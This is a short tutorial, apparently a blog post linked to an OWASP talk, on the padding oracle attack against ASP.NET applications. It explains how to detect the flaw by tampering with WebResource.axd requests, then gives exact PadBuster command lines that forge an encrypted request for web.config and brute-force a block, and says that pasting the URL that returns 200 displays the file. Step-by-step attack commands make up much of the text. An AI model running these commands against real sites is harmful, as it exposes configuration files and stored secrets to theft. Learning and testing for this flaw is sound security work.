In cryptography, the padding oracle attack is an attack on the CBC mode of operation, where the server leaks data about whether the padding of an encrypted message is correct or not. oracle refers to a mechanism in cryptography that can be used to determine whether a test has passed or failed. This information would help an attacker to decrypt and encrypt data without key.
How to find your .NET application is vulnerable to padding oracle attack or not?
- Using burp proxy capture a request to webresource.axd file
Ex: http://somesite.com/webresource.axd?d=qmZbysenet6VGS94Ord8gQ2 - Change one character in the d value and send the request to the server. Observe the response.
- Send request to a non existent aspx page on the server. Observe the response.
Ex: http://somesite.com/nonexist.aspx - Response 2 and response 3 are differ, then it is possible to exploit the attack.
My OWASP presentation on 20-Aug-2011:
padbuster tool can be used to automate the padding oracle attack. This tool is a free ware and you can download it from – https://github.com/GDSSecurity/PadBuster/blob/master/padBuster.pl
* Perl is required to run padbuster. Perl can be downloaded from
http://strawberry-perl.googlecode.com/files/strawberry-perl-5.12.3.0.msi
Padbuster usage to attack .NET applications
- Encrypt web.config file -
padBuster.pl http://somesite.com/WebResource.axd?d=AAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAAAAAAAAAAAAAAA2 16 -encoding 3 -plaintext "|||~/web.config
- Brute force the first block-
padBuster.pl http://www.myapp.com/ScriptResource.axd?d=iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 iJBC6whziIIWQhKYX4KDpwAAAAAAAAAAAAAAAAAAAAA1 16 -encoding 3 -bruteforce –log
- Observe the log, at some point you will get 200 ok message, grab that URL and paste it in browser. It displays the web.config content.
Watch this video to get a better understanding of the attack:
